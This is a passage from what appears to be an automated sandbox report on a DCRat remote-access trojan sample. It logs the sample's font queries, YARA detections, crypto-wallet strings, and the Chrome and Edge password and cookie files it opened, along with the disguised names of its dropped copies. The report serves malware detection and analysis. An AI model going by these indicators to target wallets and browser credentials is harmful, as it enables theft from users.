                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected DCRat
                        Source: Yara matchFile source: 3e88PGFfkf.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.3e88PGFfkf.exe.f50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.4176520773.00000000035F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.4176520773.0000000003779000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.4176520773.000000000345B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1698323315.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 3e88PGFfkf.exe PID: 3732, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: psSFLznncXozWndMhTDdwutNn.exe PID: 6268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Recovery\WinStore.App.exe, type: DROPPED
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\8
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1727533333.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                        Source: 3e88PGFfkf.exe, 00000000.00000002.1727533333.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: psSFLznncXozWndMhTDdwutNn.exe, 00000005.00000002.4176520773.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
